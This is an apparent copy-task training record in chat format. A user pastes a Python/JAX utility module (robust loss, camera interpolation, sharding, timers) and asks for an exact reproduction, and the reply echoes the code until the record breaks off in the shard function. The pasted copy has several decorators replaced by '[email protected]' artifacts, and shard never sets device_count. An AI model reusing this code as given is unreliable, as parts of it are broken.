jnp.exp(jnp.minimum(x, 87.5))\n\n\ndef expm1_safe(x):\n \"\"\"The same as tf.math.expm1(x), but clamps the input to prevent NaNs.\"\"\"\n return jnp.expm1(jnp.minimum(x, 87.5))\n\n\ndef safe_sqrt(x, eps=1e-7):\n safe_x = jnp.where(x == 0, jnp.ones_like(x) * eps, x)\n return jnp.sqrt(safe_x)\n\n\[email protected]\ndef general_loss_with_squared_residual(squared_x, alpha, scale):\n r\"\"\"The general loss that takes a squared residual.\n\n This fuses the sqrt operation done to compute many residuals while preserving\n the square in the loss formulation.\n\n This implements the rho(x, \\alpha, c) function described in \"A General and\n Adaptive Robust Loss Function\", Jonathan T. Barron,\n https://arxiv.org/abs/1701.03077.\n\n Args:\n squared_x: The residual for which the loss is being computed. x can have\n any shape, and alpha and scale will be broadcasted to match x's shape if\n necessary.\n alpha: The shape parameter of the loss (\\alpha in the paper), where more\n negative values produce a loss with more robust behavior (outliers \"cost\"\n less), and more positive values produce a loss with less robust behavior\n (outliers are penalized more heavily). Alpha can be any value in\n [-infinity, infinity], but the gradient of the loss with respect to alpha\n is 0 at -infinity, infinity, 0, and 2. Varying alpha allows for smooth\n interpolation between several discrete robust losses:\n alpha=-Infinity: Welsch/Leclerc Loss.\n alpha=-2: Geman-McClure loss.\n alpha=0: Cauchy/Lortentzian loss.\n alpha=1: Charbonnier/pseudo-Huber loss.\n alpha=2: L2 loss.\n scale: The scale parameter of the loss. When |x| < scale, the loss is an\n L2-like quadratic bowl, and when |x| > scale the loss function takes on a\n different shape according to alpha.\n\n Returns:\n The losses for each element of x, in the same shape as x.\n \"\"\"\n eps = jnp.finfo(jnp.float32).eps\n\n # This will be used repeatedly.\n squared_scaled_x = squared_x / (scale ** 2)\n\n # The loss when alpha == 2.\n loss_two = 0.5 * squared_scaled_x\n # The loss when alpha == 0.\n loss_zero = log1p_safe(0.5 * squared_scaled_x)\n # The loss when alpha == -infinity.\n loss_neginf = -jnp.expm1(-0.5 * squared_scaled_x)\n # The loss when alpha == +infinity.\n loss_posinf = expm1_safe(0.5 * squared_scaled_x)\n\n # The loss when not in one of the above special cases.\n # Clamp |2-alpha| to be >= machine epsilon so that it's safe to divide by.\n beta_safe = jnp.maximum(eps, jnp.abs(alpha - 2.))\n # Clamp |alpha| to be >= machine epsilon so that it's safe to divide by.\n alpha_safe = jnp.where(\n jnp.greater_equal(alpha, 0.), jnp.ones_like(alpha),\n -jnp.ones_like(alpha)) * jnp.maximum(eps, jnp.abs(alpha))\n loss_otherwise = (beta_safe / alpha_safe) * (\n jnp.power(squared_scaled_x / beta_safe + 1., 0.5 * alpha) - 1.)\n\n # Select which of the cases of the loss to return.\n loss = jnp.where(\n alpha == -jnp.inf, loss_neginf,\n jnp.where(\n alpha == 0, loss_zero,\n jnp.where(\n alpha == 2, loss_two,\n jnp.where(alpha == jnp.inf, loss_posinf, loss_otherwise))))\n\n return loss\n\n\ndef shard(xs, device_count=None):\n \"\"\"Split data into shards for multiple devices along the first dimension.\"\"\"\n if device_count is None:\n jax.local_device_count()\n return jax.tree_map(lambda x: x.reshape((device_count, -1) + x.shape[1:]), xs)\n\n\ndef to_device(xs):\n \"\"\"Transfer data to devices (GPU/TPU).\"\"\"\n return jax.tree_map(jnp.array, xs)\n\n\ndef unshard(x, padding=0):\n \"\"\"Collect the sharded tensor to the shape before sharding.\"\"\"\n if padding > 0:\n return x.reshape([x.shape[0] * x.shape[1]] + list(x.shape[2:]))[:-padding]\n else:\n return x.reshape([x.shape[0] * x.shape[1]] + list(x.shape[2:]))\n\n\ndef normalize(x):\n \"\"\"Normalization helper function.\"\"\"\n return x / np.linalg.norm(x)\n\n\ndef parallel_map(f, iterable, max_threads=None, show_pbar=False, **kwargs):\n \"\"\"Parallel version of map().\"\"\"\n with futures.ThreadPoolExecutor(max_threads) as executor:\n if show_pbar:\n results = tqdm.tqdm(\n executor.map(f, iterable, **kwargs), total=len(iterable))\n else:\n results = executor.map(f, iterable, **kwargs)\n return list(results)\n\n\ndef strided_subset(sequence, count):\n \"\"\"Returns a strided subset of a list.\"\"\"\n if count:\n stride = max(1, len(sequence) // count)\n return sequence[::stride]\n return sequence\n\n\ndef tree_collate(list_of_pytrees):\n \"\"\"Collates a list of pytrees with the same structure.\"\"\"\n return tree_util.tree_multimap(lambda *x: np.asarray(x), *list_of_pytrees)\n\n\[email protected]\ndef print_time(name):\n \"\"\"Records the time elapsed.\"\"\"\n start = time.time()\n yield\n elapsed = time.time() - start\n print(f'[{name}] time elapsed: {elapsed:.04f}')\n\n\nclass ValueMeter:\n \"\"\"Tracks the average of a value.\"\"\"\n\n def __init__(self):\n self._values = []\n\n def reset(self):\n \"\"\"Resets the meter.\"\"\"\n self._values.clear()\n\n def update(self, value):\n \"\"\"Adds a value to the meter.\"\"\"\n self._values.append(value)\n\n def reduce(self, reduction='mean'):\n \"\"\"Reduces the tracked values.\"\"\"\n if reduction == 'mean':\n return np.mean(self._values)\n elif reduction == 'std':\n return np.std(self._values)\n elif reduction == 'last':\n return self._values[-1]\n else:\n raise ValueError(f'Unknown reduction {reduction}')\n\n\nclass TimeTracker:\n \"\"\"Tracks the average time elapsed over multiple steps.\"\"\"\n\n def __init__(self):\n self._meters = collections.defaultdict(ValueMeter)\n self._marked_time = collections.defaultdict(float)\n\n @contextlib.contextmanager\n def record_time(self, key: str):\n \"\"\"Records the time elapsed.\"\"\"\n start = time.time()\n yield\n elapsed = time.time() - start\n self.update(key, elapsed)\n\n def update(self, key, value):\n \"\"\"Updates the time value for a given key.\"\"\"\n self._meters[key].update(value)\n\n def tic(self, *args):\n \"\"\"Marks the starting time of an event.\"\"\"\n for key in args:\n self._marked_time[key] = time.time()\n\n def toc(self, *args):\n \"\"\"Records the time elapsed based on the previous call to `tic`.\"\"\"\n for key in args:\n self.update(key, time.time() - self._marked_time[key])\n del self._marked_time[key]\n\n def reset(self):\n \"\"\"Resets all time meters.\"\"\"\n for meter in self._meters.values():\n meter.reset()\n\n def summary(self, reduction='mean'):\n \"\"\"Returns a dictionary of reduced times.\"\"\"\n time_dict = {k: v.reduce(reduction) for k, v in self._meters.items()}\n if 'total' not in time_dict:\n time_dict['total'] = sum(time_dict.values())\n\n time_dict['steps_per_sec'] = 1.0 / time_dict['total']\n return time_dict\n\n def summary_str(self, reduction='mean'):\n \"\"\"Returns a string of reduced times.\"\"\"\n strings = [f'{k}={v:.04f}' for k, v in self.summary(reduction).items()]\n return ', '.join(strings)\n```",
"role": "user"
}
] |
[
{
"content": "Reproduce the code exactly as provided (keep formatting):\n<|memory_start|>```python\n# Copyright 2021 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Lint as: python3\n\"\"\"Non-differentiable utility functions.\"\"\"\nimport collections\nfrom concurrent import futures\nimport contextlib\nimport functools\nimport time\nfrom typing import List, Union\n\nimport jax\nfrom jax import tree_util\nimport jax.numpy as jnp\nimport numpy as np\nfrom scipy import interpolate\nfrom scipy.spatial.transform import Rotation\nfrom scipy.spatial.transform import Slerp\nimport tqdm\n\n\n# pylint: disable=unused-argument\[email protected](jax.custom_jvp, nondiff_argnums=(1, 2, 3))\ndef safe_norm(x, axis=-1, keepdims=False, tol=1e-9):\n \"\"\"Calculates a np.linalg.norm(d) that's safe for gradients at d=0.\n\n These gymnastics are to avoid a poorly defined gradient for np.linal.norm(0)\n see https://github.com/google/jax/issues/3058 for details\n\n\n Args:\n x: A np.array\n axis: The axis along which to compute the norm\n keepdims: if True don't squeeze the axis.\n tol: the absolute threshold within which to zero out the gradient.\n\n Returns:\n Equivalent to np.linalg.norm(d)\n \"\"\"\n return jnp.linalg.norm(x, axis=axis, keepdims=keepdims)\n\n\n@safe_norm.defjvp\ndef _safe_norm_jvp(axis, keepdims, tol, primals, tangents):\n \"\"\"Custom JVP rule for safe_norm.\"\"\"\n x, = primals\n x_dot, = tangents\n safe_tol = max(tol, 1e-30)\n y = safe_norm(x, tol=safe_tol, axis=axis, keepdims=True)\n y_safe = jnp.maximum(y, tol) # Prevent divide by zero.\n y_dot = jnp.where(y > safe_tol, x_dot * x / y_safe, jnp.zeros_like(x))\n y_dot = jnp.sum(y_dot, axis=axis, keepdims=True)\n # Squeeze the axis if `keepdims` is True.\n if not keepdims:\n y = jnp.squeeze(y, axis=axis)\n y_dot = jnp.squeeze(y_dot, axis=axis)\n return y, y_dot\n\n\ndef jacobian_to_curl(jacobian):\n \"\"\"Computes the curl from the Jacobian.\"\"\"\n dfx_dy = jacobian[..., 0, 1]\n dfx_dz = jacobian[..., 0, 2]\n dfy_dx = jacobian[..., 1, 0]\n dfy_dz = jacobian[..., 1, 2]\n dfz_dx = jacobian[..., 2, 0]\n dfz_dy = jacobian[..., 2, 1]\n\n return jnp.stack([\n dfz_dy - dfy_dz,\n dfx_dz - dfz_dx,\n dfy_dx - dfx_dy,\n ], axis=-1)\n\n\ndef jacobian_to_div(jacobian):\n \"\"\"Computes the divergence from the Jacobian.\"\"\"\n # If F : x -> x + f(x) then dF/dx = 1 + df/dx, so subtract 1 for each\n # diagonal of the Jacobian.\n return jnp.trace(jacobian, axis1=-2, axis2=-1) - 3.0\n\n\ndef compute_psnr(mse):\n \"\"\"Compute psnr value given mse (we assume the maximum pixel value is 1).\n\n Args:\n mse: float, mean square error of pixels.\n\n Returns:\n psnr: float, the psnr value.\n \"\"\"\n return -10. * jnp.log(mse) / jnp.log(10.)\n\n\[email protected]\ndef robust_whiten(x):\n median = jnp.nanmedian(x)\n mad = jnp.nanmean(jnp.abs(x - median))\n return (x - median) / mad\n\n\ndef interpolate_codes(\n codes: Union[np.ndarray, List[np.ndarray]],\n num_samples: int,\n method='spline'):\n \"\"\"Interpolates latent codes.\n\n Args:\n codes: the codes to interpolate.\n num_samples: the number of samples to interpolate to.\n method: which method to use for interpolation.\n\n Returns:\n (np.ndarray): the interpolated codes.\n \"\"\"\n if isinstance(codes, list):\n codes = np.array(codes)\n t = np.arange(len(codes))\n xs = np.linspace(0, len(codes) - 1, num_samples)\n if method == 'spline':\n cs = interpolate.CubicSpline(t, codes, bc_type='natural')\n return cs(xs).astype(np.float32)\n elif method == 'linear':\n interp = interpolate.interp1d(t, codes, axis=0)\n return interp(xs).astype(np.float32)\n\n raise ValueError(f'Unknown method {method!r}')\n\n\ndef interpolate_cameras(cameras, num_samples: int):\n \"\"\"Interpolates the cameras to the number of output samples.\n\n Uses a spherical linear interpolation (Slerp) to interpolate the camera\n orientations and a cubic spline to interpolate the camera positions.\n\n Args:\n cameras: the input cameras to interpolate.\n num_samples: the number of output cameras.\n\n Returns:\n (List[vision_sfm.Camera]): a list of interpolated cameras.\n \"\"\"\n rotations = []\n positions = []\n for camera in cameras:\n rotations.append(camera.orientation)\n positions.append(camera.position)\n\n in_times = np.linspace(0, 1, len(rotations))\n slerp = Slerp(in_times, Rotation.from_dcm(rotations))\n spline = interpolate.CubicSpline(in_times, positions)\n\n out_times = np.linspace(0, 1, num_samples)\n out_rots = slerp(out_times).as_dcm()\n out_positions = spline(out_times)\n\n ref_camera = cameras[0]\n out_cameras = []\n for out_rot, out_pos in zip(out_rots, out_positions):\n out_camera = ref_camera.copy()\n out_camera.orientation = out_rot\n out_camera.position = out_pos\n out_cameras.append(out_camera)\n return out_cameras\n\n\ndef logit(y):\n \"\"\"The inverse of tf.nn.sigmoid().\"\"\"\n return -jnp.log(1. / y - 1.)\n\n\ndef affine_sigmoid(real, lo=0, hi=1):\n \"\"\"Maps reals to (lo, hi), where 0 maps to (lo+hi)/2.\"\"\"\n if not lo < hi:\n raise ValueError('`lo` (%g) must be < `hi` (%g)' % (lo, hi))\n alpha = jax.nn.sigmoid(real) * (hi - lo) + lo\n return alpha\n\n\ndef inv_affine_sigmoid(alpha, lo=0, hi=1):\n \"\"\"The inverse of affine_sigmoid(., lo, hi).\"\"\"\n if not lo < hi:\n raise ValueError('`lo` (%g) must be < `hi` (%g)' % (lo, hi))\n real = logit((alpha - lo) / (hi - lo))\n return real\n\n\ndef inv_softplus(y):\n \"\"\"The inverse of tf.nn.softplus().\"\"\"\n return jnp.where(y > 87.5, y, jnp.log(jnp.expm1(y)))\n\n\ndef affine_softplus(real, lo=0, ref=1):\n \"\"\"Maps real numbers to (lo, infinity), where 0 maps to ref.\"\"\"\n if not lo < ref:\n raise ValueError('`lo` (%g) must be < `ref` (%g)' % (lo, ref))\n shift = inv_softplus(1.0)\n scale = (ref - lo) * jax.nn.softplus(real + shift) + lo\n return scale\n\n\ndef inv_affine_softplus(scale, lo=0, ref=1):\n \"\"\"The inverse of affine_softplus(., lo, ref).\"\"\"\n if not lo < ref:\n raise ValueError('`lo` (%g) must be < `ref` (%g)' % (lo, ref))\n shift = inv_softplus(1.0)\n real = inv_softplus((scale - lo) / (ref - lo)) - shift\n return real\n\n\ndef learning_rate_decay(step, init_lr=5e-4, decay_steps=100000, decay_rate=0.1):\n \"\"\"Continuous learning rate decay function.\n\n The computation for learning rate is lr = (init_lr * decay_rate**(step /\n decay_steps))\n\n Args:\n step: int, the global optimization step.\n init_lr: float, the initial learning rate.\n decay_steps: int, the decay steps, please see the learning rate computation\n above.\n decay_rate: float, the decay rate, please see the learning rate computation\n above.\n\n Returns:\n lr: the learning for global step 'step'.\n \"\"\"\n power = step / decay_steps\n return init_lr * (decay_rate**power)\n\n\ndef log1p_safe(x):\n \"\"\"The same as tf.math.log1p(x), but clamps the input to prevent NaNs.\"\"\"\n return jnp.log1p(jnp.minimum(x, 3e37))\n\n\ndef exp_safe(x):\n \"\"\"The same as tf.math.exp(x), but clamps the input to prevent NaNs.\"\"\"\n return jnp.exp(jnp.minimum(x, 87.5))\n\n\ndef expm1_safe(x):\n \"\"\"The same as tf.math.expm1(x), but clamps the input to prevent NaNs.\"\"\"\n return jnp.expm1(jnp.minimum(x, 87.5))\n\n\ndef safe_sqrt(x, eps=1e-7):\n safe_x = jnp.where(x == 0, jnp.ones_like(x) * eps, x)\n return jnp.sqrt(safe_x)\n\n\[email protected]\ndef general_loss_with_squared_residual(squared_x, alpha, scale):\n r\"\"\"The general loss that takes a squared residual.\n\n This fuses the sqrt operation done to compute many residuals while preserving\n the square in the loss formulation.\n\n This implements the rho(x, \\alpha, c) function described in \"A General and\n Adaptive Robust Loss Function\", Jonathan T. Barron,\n https://arxiv.org/abs/1701.03077.\n\n Args:\n squared_x: The residual for which the loss is being computed. x can have\n any shape, and alpha and scale will be broadcasted to match x's shape if\n necessary.\n alpha: The shape parameter of the loss (\\alpha in the paper), where more\n negative values produce a loss with more robust behavior (outliers \"cost\"\n less), and more positive values produce a loss with less robust behavior\n (outliers are penalized more heavily). Alpha can be any value in\n [-infinity, infinity], but the gradient of the loss with respect to alpha\n is 0 at -infinity, infinity, 0, and 2. Varying alpha allows for smooth\n interpolation between several discrete robust losses:\n alpha=-Infinity: Welsch/Leclerc Loss.\n alpha=-2: Geman-McClure loss.\n alpha=0: Cauchy/Lortentzian loss.\n alpha=1: Charbonnier/pseudo-Huber loss.\n alpha=2: L2 loss.\n scale: The scale parameter of the loss. When |x| < scale, the loss is an\n L2-like quadratic bowl, and when |x| > scale the loss function takes on a\n different shape according to alpha.\n\n Returns:\n The losses for each element of x, in the same shape as x.\n \"\"\"\n eps = jnp.finfo(jnp.float32).eps\n\n # This will be used repeatedly.\n squared_scaled_x = squared_x / (scale ** 2)\n\n # The loss when alpha == 2.\n loss_two = 0.5 * squared_scaled_x\n # The loss when alpha == 0.\n loss_zero = log1p_safe(0.5 * squared_scaled_x)\n # The loss when alpha == -infinity.\n loss_neginf = -jnp.expm1(-0.5 * squared_scaled_x)\n # The loss when alpha == +infinity.\n loss_posinf = expm1_safe(0.5 * squared_scaled_x)\n\n # The loss when not in one of the above special cases.\n # Clamp |2-alpha| to be >= machine epsilon so that it's safe to divide by.\n beta_safe = jnp.maximum(eps, jnp.abs(alpha - 2.))\n # Clamp |alpha| to be >= machine epsilon so that it's safe to divide by.\n alpha_safe = jnp.where(\n jnp.greater_equal(alpha, 0.), jnp.ones_like(alpha),\n -jnp.ones_like(alpha)) * jnp.maximum(eps, jnp.abs(alpha))\n loss_otherwise = (beta_safe / alpha_safe) * (\n jnp.power(squared_scaled_x / beta_safe + 1., 0.5 * alpha) - 1.)\n\n # Select which of the cases of the loss to return.\n loss = jnp.where(\n alpha == -jnp.inf, loss_neginf,\n jnp.where(\n alpha == 0, loss_zero,\n jnp.where(\n alpha == 2, loss_two,\n jnp.where(alpha == jnp.inf, loss_posinf, loss_otherwise))))\n\n return loss\n\n\ndef shard(xs, device_count=None):\n \"\"\"Split data into shards for multiple devices along the first dimension.\"\"\"\n if device_count is None:\n jax.local_device_count()\n return jax.tree_map(lambda x: x.reshape((device_count, -1) + x.shape[1:]), xs)\n\n\ndef to_device(xs):\n \"\"\"Transfer data to devices (GPU/TPU).\"\"\"\n return jax.tree_map(jnp.array, xs)\n\n\ndef unshard(x, padding=0):\n \"\"\"Collect the sharded tensor to the shape before sharding.\"\"\"\n if padding > 0:\n return x.reshape([x.shape[0] * x.shape[1]] + list(x.shape[2:]))[:-padding]\n else:\n return x.reshape([x.shape[0] * x.shape[1]] + list(x.shape[2:]))\n\n\ndef normalize(x):\n \"\"\"Normalization helper function.\"\"\"\n return x / np.linalg.norm(x)\n\n\ndef parallel_map(f, iterable, max_threads=None, show_pbar=False, **kwargs):\n \"\"\"Parallel version of map().\"\"\"\n with futures.ThreadPoolExecutor(max_threads) as executor:\n if show_pbar:\n results = tqdm.tqdm(\n executor.map(f, iterable, **kwargs), total=len(iterable))\n else:\n results = executor.map(f, iterable, **kwargs)\n return list(results)\n\n\ndef strided_subset(sequence, count):\n \"\"\"Returns a strided subset of a list.\"\"\"\n if count:\n stride = max(1, len(sequence) // count)\n return sequence[::stride]\n return sequence\n\n\ndef tree_collate(list_of_pytrees):\n \"\"\"Collates a list of pytrees with the same structure.\"\"\"\n return tree_util.tree_multimap(lambda *x: np.asarray(x), *list_of_pytrees)\n\n\[email protected]\ndef print_time(name):\n \"\"\"Records the time elapsed.\"\"\"\n start = time.time()\n yield\n elapsed = time.time() - start\n print(f'[{name}] time elapsed: {elapsed:.04f}')\n\n\nclass ValueMeter:\n \"\"\"Tracks the average of a value.\"\"\"\n\n def __init__(self):\n self._values = []\n\n def reset(self):\n \"\"\"Resets the meter.\"\"\"\n self._values.clear()\n\n def update(self, value):\n \"\"\"Adds a value to the meter.\"\"\"\n self._values.append(value)\n\n def reduce(self, reduction='mean'):\n \"\"\"Reduces the tracked values.\"\"\"\n if reduction == 'mean':\n return np.mean(self._values)\n elif reduction == 'std':\n return np.std(self._values)\n elif reduction == 'last':\n return self._values[-1]\n else:\n raise ValueError(f'Unknown reduction {reduction}')\n\n\nclass TimeTracker:\n \"\"\"Tracks the average time elapsed over multiple steps.\"\"\"\n\n def __init__(self):\n self._meters = collections.defaultdict(ValueMeter)\n self._marked_time = collections.defaultdict(float)\n\n @contextlib.contextmanager\n def record_time(self, key: str):\n \"\"\"Records the time elapsed.\"\"\"\n start = time.time()\n yield\n elapsed = time.time() - start\n self.update(key, elapsed)\n\n def update(self, key, value):\n \"\"\"Updates the time value for a given key.\"\"\"\n self._meters[key].update(value)\n\n def tic(self, *args):\n \"\"\"Marks the starting time of an event.\"\"\"\n for key in args:\n self._marked_time[key] = time.time()\n\n def toc(self, *args):\n \"\"\"Records the time elapsed based on the previous call to `tic`.\"\"\"\n for key in args:\n self.update(key, time.time() - self._marked_time[key])\n del self._marked_time[key]\n\n def reset(self):\n \"\"\"Resets all time meters.\"\"\"\n for meter in self._meters.values():\n meter.reset()\n\n def summary(self, reduction='mean'):\n \"\"\"Returns a dictionary of reduced times.\"\"\"\n time_dict = {k: v.reduce(reduction) for k, v in self._meters.items()}\n if 'total' not in time_dict:\n time_dict['total'] = sum(time_dict.values())\n\n time_dict['steps_per_sec'] = 1.0 / time_dict['total']\n return time_dict\n\n def summary_str(self, reduction='mean'):\n \"\"\"Returns a string of reduced times.\"\"\"\n strings = [f'{k}={v:.04f}' for k, v in self.summary(reduction).items()]\n return ', '.join(strings)\n```<|memory_end|>",
"role": "user"
}
] |
```python
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Non-differentiable utility functions."""
import collections
from concurrent import futures
import contextlib
import functools
import time
from typing import List, Union
import jax
from jax import tree_util
import jax.numpy as jnp
import numpy as np
from scipy import interpolate
from scipy.spatial.transform import Rotation
from scipy.spatial.transform import Slerp
import tqdm
# pylint: disable=unused-argument
@functools.partial(jax.custom_jvp, nondiff_argnums=(1, 2, 3))
def safe_norm(x, axis=-1, keepdims=False, tol=1e-9):
"""Calculates a np.linalg.norm(d) that's safe for gradients at d=0.
These gymnastics are to avoid a poorly defined gradient for np.linal.norm(0)
see https://github.com/google/jax/issues/3058 for details
Args:
x: A np.array
axis: The axis along which to compute the norm
keepdims: if True don't squeeze the axis.
tol: the absolute threshold within which to zero out the gradient.
Returns:
Equivalent to np.linalg.norm(d)
"""
return jnp.linalg.norm(x, axis=axis, keepdims=keepdims)
@safe_norm.defjvp
def _safe_norm_jvp(axis, keepdims, tol, primals, tangents):
"""Custom JVP rule for safe_norm."""
x, = primals
x_dot, = tangents
safe_tol = max(tol, 1e-30)
y = safe_norm(x, tol=safe_tol, axis=axis, keepdims=True)
y_safe = jnp.maximum(y, tol) # Prevent divide by zero.
y_dot = jnp.where(y > safe_tol, x_dot * x / y_safe, jnp.zeros_like(x))
y_dot = jnp.sum(y_dot, axis=axis, keepdims=True)
# Squeeze the axis if `keepdims` is True.
if not keepdims:
y = jnp.squeeze(y, axis=axis)
y_dot = jnp.squeeze(y_dot, axis=axis)
return y, y_dot
def jacobian_to_curl(jacobian):
"""Computes the curl from the Jacobian."""
dfx_dy = jacobian[..., 0, 1]
dfx_dz = jacobian[..., 0, 2]
dfy_dx = jacobian[..., 1, 0]
dfy_dz = jacobian[..., 1, 2]
dfz_dx = jacobian[..., 2, 0]
dfz_dy = jacobian[..., 2, 1]
return jnp.stack([
dfz_dy - dfy_dz,
dfx_dz - dfz_dx,
dfy_dx - dfx_dy,
], axis=-1)
def jacobian_to_div(jacobian):
"""Computes the divergence from the Jacobian."""
# If F : x -> x + f(x) then dF/dx = 1 + df/dx, so subtract 1 for each
# diagonal of the Jacobian.
return jnp.trace(jacobian, axis1=-2, axis2=-1) - 3.0
def compute_psnr(mse):
"""Compute psnr value given mse (we assume the maximum pixel value is 1).
Args:
mse: float, mean square error of pixels.
Returns:
psnr: float, the psnr value.
"""
return -10. * jnp.log(mse) / jnp.log(10.)
@jax.jit
def robust_whiten(x):
median = jnp.nanmedian(x)
mad = jnp.nanmean(jnp.abs(x - median))
return (x - median) / mad
def interpolate_codes(
codes: Union[np.ndarray, List[np.ndarray]],
num_samples: int,
method='spline'):
"""Interpolates latent codes.
Args:
codes: the codes to interpolate.
num_samples: the number of samples to interpolate to.
method: which method to use for interpolation.
Returns:
(np.ndarray): the interpolated codes.
"""
if isinstance(codes, list):
codes = np.array(codes)
t = np.arange(len(codes))
xs = np.linspace(0, len(codes) - 1, num_samples)
if method == 'spline':
cs = interpolate.CubicSpline(t, codes, bc_type='natural')
return cs(xs).astype(np.float32)
elif method == 'linear':
interp = interpolate.interp1d(t, codes, axis=0)
return interp(xs).astype(np.float32)
raise ValueError(f'Unknown method {method!r}')
def interpolate_cameras(cameras, num_samples: int):
"""Interpolates the cameras to the number of output samples.
Uses a spherical linear interpolation (Slerp) to interpolate the camera
orientations and a cubic spline to interpolate the camera positions.
Args:
cameras: the input cameras to interpolate.
num_samples: the number of output cameras.
Returns:
(List[vision_sfm.Camera]): a list of interpolated cameras.
"""
rotations = []
positions = []
for camera in cameras:
rotations.append(camera.orientation)
positions.append(camera.position)
in_times = np.linspace(0, 1, len(rotations))
slerp = Slerp(in_times, Rotation.from_dcm(rotations))
spline = interpolate.CubicSpline(in_times, positions)
out_times = np.linspace(0, 1, num_samples)
out_rots = slerp(out_times).as_dcm()
out_positions = spline(out_times)
ref_camera = cameras[0]
out_cameras = []
for out_rot, out_pos in zip(out_rots, out_positions):
out_camera = ref_camera.copy()
out_camera.orientation = out_rot
out_camera.position = out_pos
out_cameras.append(out_camera)
return out_cameras
def logit(y):
"""The inverse of tf.nn.sigmoid()."""
return -jnp.log(1. / y - 1.)
def affine_sigmoid(real, lo=0, hi=1):
"""Maps reals to (lo, hi), where 0 maps to (lo+hi)/2."""
if not lo < hi:
raise ValueError('`lo` (%g) must be < `hi` (%g)' % (lo, hi))
alpha = jax.nn.sigmoid(real) * (hi - lo) + lo
return alpha
def inv_affine_sigmoid(alpha, lo=0, hi=1):
"""The inverse of affine_sigmoid(., lo, hi)."""
if not lo < hi:
raise ValueError('`lo` (%g) must be < `hi` (%g)' % (lo, hi))
real = logit((alpha - lo) / (hi - lo))
return real
def inv_softplus(y):
"""The inverse of tf.nn.softplus()."""
return jnp.where(y > 87.5, y, jnp.log(jnp.expm1(y)))
def affine_softplus(real, lo=0, ref=1):
"""Maps real numbers to (lo, infinity), where 0 maps to ref."""
if not lo < ref:
raise ValueError('`lo` (%g) must be < `ref` (%g)' % (lo, ref))
shift = inv_softplus(1.0)
scale = (ref - lo) * jax.nn.softplus(real + shift) + lo
return scale
def inv_affine_softplus(scale, lo=0, ref=1):
"""The inverse of affine_softplus(., lo, ref)."""
if not lo < ref:
raise ValueError('`lo` (%g) must be < `ref` (%g)' % (lo, ref))
shift = inv_softplus(1.0)
real = inv_softplus((scale - lo) / (ref - lo)) - shift
return real
def learning_rate_decay(step, init_lr=5e-4, decay_steps=100000, decay_rate=0.1):
"""Continuous learning rate decay function.
The computation for learning rate is lr = (init_lr * decay_rate**(step /
decay_steps))
Args:
step: int, the global optimization step.
init_lr: float, the initial learning rate.
decay_steps: int, the decay steps, please see the learning rate computation
above.
decay_rate: float, the decay rate, please see the learning rate computation
above.
Returns:
lr: the learning for global step 'step'.
"""
power = step / decay_steps
return init_lr * (decay_rate**power)
def log1p_safe(x):
"""The same as tf.math.log1p(x), but clamps the input to prevent NaNs."""
return jnp.log1p(jnp.minimum(x, 3e37))
def exp_safe(x):
"""The same as tf.math.exp(x), but clamps the input to prevent NaNs."""
return jnp.exp(jnp.minimum(x, 87.5))
def expm1_safe(x):
"""The same as tf.math.expm1(x), but clamps the input to prevent NaNs."""
return jnp.expm1(jnp.minimum(x, 87.5))
def safe_sqrt(x, eps=1e-7):
safe_x = jnp.where(x == 0, jnp.ones_like(x) * eps, x)
return jnp.sqrt(safe_x)
@jax.jit
def general_loss_with_squared_residual(squared_x, alpha, scale):
r"""The general loss that takes a squared residual.
This fuses the sqrt operation done to compute many residuals while preserving
the square in the loss formulation.
This implements the rho(x, \alpha, c) function described in "A General and
Adaptive Robust Loss Function", Jonathan T. Barron,
https://arxiv.org/abs/1701.03077.
Args:
squared_x: The residual for which the loss is being computed. x can have
any shape, and alpha and scale will be broadcasted to match x's shape if
necessary.
alpha: The shape parameter of the loss (\alpha in the paper), where more
negative values produce a loss with more robust behavior (outliers "cost"
less), and more positive values produce a loss with less robust behavior
(outliers are penalized more heavily). Alpha can be any value in
[-infinity, infinity], but the gradient of the loss with respect to alpha
is 0 at -infinity, infinity, 0, and 2. Varying alpha allows for smooth
interpolation between several discrete robust losses:
alpha=-Infinity: Welsch/Leclerc Loss.
alpha=-2: Geman-McClure loss.
alpha=0: Cauchy/Lortentzian loss.
alpha=1: Charbonnier/pseudo-Huber loss.
alpha=2: L2 loss.
scale: The scale parameter of the loss. When |x| < scale, the loss is an
L2-like quadratic bowl, and when |x| > scale the loss function takes on a
different shape according to alpha.
Returns:
The losses for each element of x, in the same shape as x.
"""
eps = jnp.finfo(jnp.float32).eps
# This will be used repeatedly.
squared_scaled_x = squared_x / (scale ** 2)
# The loss when alpha == 2.
loss_two = 0.5 * squared_scaled_x
# The loss when alpha == 0.
loss_zero = log1p_safe(0.5 * squared_scaled_x)
# The loss when alpha == -infinity.
loss_neginf = -jnp.expm1(-0.5 * squared_scaled_x)
# The loss when alpha == +infinity.
loss_posinf = expm1_safe(0.5 * squared_scaled_x)
# The loss when not in one of the above special cases.
# Clamp |2-alpha| to be >= machine epsilon so that it's safe to divide by.
beta_safe = jnp.maximum(eps, jnp.abs(alpha - 2.))
# Clamp |alpha| to be >= machine epsilon so that it's safe to divide by.
alpha_safe = jnp.where(
jnp.greater_equal(alpha, 0.), jnp.ones_like(alpha),
-jnp.ones_like(alpha)) * jnp.maximum(eps, jnp.abs(alpha))
loss_otherwise = (beta_safe / alpha_safe) * (
jnp.power(squared_scaled_x / beta_safe + 1., 0.5 * alpha) - 1.)
# Select which of the cases of the loss to return.
loss = jnp.where(
alpha == -jnp.inf, loss_neginf,
jnp.where(
alpha == 0, loss_zero,
jnp.where(
alpha == 2, loss_two,
jnp.where(alpha == jnp.inf, loss_posinf, loss_otherwise))))
return loss
def shard(xs, device_count=None):
"""Split data into shards for multiple devices along the first dimension."""
if device_count is None:
jax.local_device_count()
